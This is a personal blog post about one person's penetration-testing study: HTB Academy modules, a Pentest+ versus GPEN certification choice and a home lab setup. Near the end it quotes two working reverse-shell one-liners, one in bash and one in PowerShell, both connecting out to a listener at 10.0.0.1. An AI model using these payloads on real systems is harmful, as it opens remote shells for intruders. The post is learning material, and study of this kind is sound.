Hacking Journey | Post 6

New week – New Focus.

Ok – last week. I wanted to try a few Hack The Box machines, and it did not end well. I’m pretty good at enumeration now, but beyond finding the exploits, I am absolutely terrible at executing them. So – I decided to go back to the classroom, or in this case the academy.

Hack The Box academy is a pretty good platform for learning, the only thing is that the answer flags can be pretty annoying sometimes. There are times when they ask simple things, specifically the Shells & Payloads section where I put in the right answer, but I make the mistake of capitalizing my answer – so if you’re reading this or whatever, make sure you don’t use any capital letters, it might save you a headache.

To talk more about HTB Academy, I say it’s a pretty good platform because hacking, for the most part, isn’t conceptually based – beyond the normal concepts of security. The only thing that is conceptually based is perhaps the tools and the purpose behind those tools. On the blue side, implementation is a little bit easier, because the options are mainly drop downs or documented as best practices somewhere. Whereas, in hacking – it’s a “find you’re own path” kind of thing.

Pentest+ vs GPEN

I’ve been teetering on the idea of taking either Pentest+ by CompTIA or GPEN by SANS. The issue, is that I’d be taking GPEN without the course, so I’d be going in blind for the most part. I’m familiar with CompTIA, in my opinion, they’re the easiest format in terms of test taking, and they’re well documented in terms of third party media, like Sybex, Youtube, etc… So – I think I’ll take Pentest+ to fill in the gap in my resume, even though I heavily desire GPEN, but I don’t think it’s worth taking the chance. The test itself is almost a grand, and there’s a higher risk of failure since the only way to really get the test source material is by buying into a class.

Anyways, to cover the weekend – my amazing wife organized about everything in the garage – so it allowed me space to set up my desktop workstation, where I was running a Moodle “test” server, but Rocky Linux or more specifically SELinux is pretty new to me, so I decided to scrap that and turn my machine into a hacking machine. I’ve installed OpenSUSE Tumbleweed as the main work station (it was either that or Fedora – but I wanted to try Tumbleweed so…) and set up a KVM Qemu virtual machine manager to later add on Black Arch. I know… unconventional. But I want to try new things. The only issue is that Black Arch, kind of looks gross as a UI. They obviously don’t care, and rightfully so – as their distribution is based off utility. Also, I think shell scripting Black Arch into an existing Arch Linux machine is a lot better, as you can have custom user profiles rather than the vanilla one. Little things I really shouldn’t care about, but I might still waste my time doing it.

Finished SQL Injection Fundamentals on HTB Academy

This one says it’s medium difficulty – but to be honest – it’s the easiest one I’ve done so far. It’s pretty straightforward, and I didn’t get any hiccups. I’m proceeding to the Shells & Payloads, but… I’ve done about half of it before I did SQLi Fundamentals, and I don’t like the Windows portion. Nothing against HTB Academy, I just don’t understand why everything has to be so difficult on Windows. Like why can’t they just create a native SSH like environment? The entire payload is like a paragraph long.

For instance, here’s a sample shell payload to get a reverse shell to a listening attacker on Linux:

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Here’s the same thing, but for Powershell:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

That’s ridiculous Windows. Why do you exist?

I’m going to sign off here. I’m thinking of starting a podcast – just because I’ve always wanted to do some type of Audio/Video content – but I don’t have the time to edit Video anymore, so maybe just Audio? Even still it’d be stretching out my time. We’ll see.

By Diego Uy

Military dood, father of three, husband of a sexy momma. Network Administrator | Security enthusiast.

Leave a comment

Your email address will not be published. Required fields are marked *